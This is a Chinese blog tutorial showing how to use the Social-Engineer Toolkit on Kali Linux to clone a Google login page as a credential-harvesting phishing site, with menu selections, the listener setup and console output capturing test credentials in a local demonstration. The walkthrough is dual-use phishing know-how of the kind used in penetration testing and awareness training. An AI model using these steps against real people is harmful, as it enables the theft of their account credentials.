荐 【kali linux】setoolkit社会工程学攻击
setoolkit
是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。
setoolkit 目录结构
modules
readme
README.md
requirements.txt
seautomate
seproxy
setoolkit
setup.py
seupdate
src
**setoolkit启动 **
通过./setoolkit
启动。看到如下图形,启动成功。
默认会有如下选项
Social-Engineering Attacks ##社会工程学攻击
Penetration Testing (Fast-Track) ##快速追踪测试
Third Party Modules ##第三方模块
Update the Social-Engineer Toolkit ##升级软件
Update SET configuration ##升级配置
Help, Credits, and About ##帮助
Exit the Social-Engineer Toolkit ##退出
这里制作个钓鱼网站为例子,选择1。
Spear-Phishing Attack Vectors ## 鱼叉式网络钓鱼
Website Attack Vectors ##网页攻击 钓鱼
Infectious Media Generator ## 感染性性攻击,就是木马
Create a Payload and Listener ##建立payloaad和listener
Mass Mailer Attack ## 邮件群发攻击
Arduino-Based Attack Vector ## Arduino基础攻击
Wireless Access Point Attack Vector ##无线接入点攻击
QRCode Generator Attack Vector ##二维码攻击
Powershell Attack Vectors ##Powershell攻击
Third Party Modules ##第三反模块
Return back to the main menu.
选择2 网站攻击进行钓鱼。
Java Applet Attack Method ## java程序攻击
Metasploit Browser Exploit Method ##Metasploit 浏览器漏洞攻击
Credential Harvester Attack Method ##钓鱼网站攻击
Tabnabbing Attack Method
Web Jacking Attack Method ## 网站jacking攻击
Multi-Attack Web Method ## 多种网站攻击方式
HTA Attack Method
Return to Main Menu
选择3 钓鱼网站攻击。既然是网站钓鱼,就一定有网站的样式,这里是选择自己网站的样式,选择一个好的模板才能更好的社工。这里可以根据按照自己的喜欢自行选择。
Web Templates ## web
Site Cloner ## 网站克隆设置
Custom Import ## 自定义导入
Return to Webattack Menu
**这里只是演示,我选择1。**之后输入用户请求提交地址。我本地演示,输入我本地地址,用来获取用户信息。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.31.188]:192.168.31.188
设置成功之后,默认带了3个模板供我们选择。这里我选择2 google的登录页面。
- Java Required
选择2之后,服务启动,如下说明访问当前地址80端口即可。
set:webattack> Select a template:2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
浏览器输入启动服务机器的ip+80端口;即可看到如下google登录页面。
在页面中试着输入账号密码,这里账号密码随意输入,对不对都行。之后点即 Sign in
进行登录。随后控制台出现如下内容。
192.168.31.123 - - [25/Jul/2020 22:48:32] "GET / HTTP/1.1" 200 -
192.168.31.123 - - [25/Jul/2020 22:48:33] "GET /favicon.ico HTTP/1.1" 404 -
[*] WE GOT A HIT! Printing the output:
PARAM: GALX=SJLCkfgaqoM
PARAM: continue=https://accounts.google.com/o/oauth2/auth?
zt=ChR
PARAM: service=lso
PARAM: dsh=-73818871067
PARAM: _utf8=?
PARAM: bgresponse=js_disab
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
POSSIBLE USERNAME FIELD FOUND: Email=123456
POSSIBLE PASSWORD FIELD FOUND: Passwd=654321
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
这里很清楚的发现,用户输入的Email为123456,密码是654321。
本文地址:https://blog.csdn.net/qq_30285985/article/details/107590718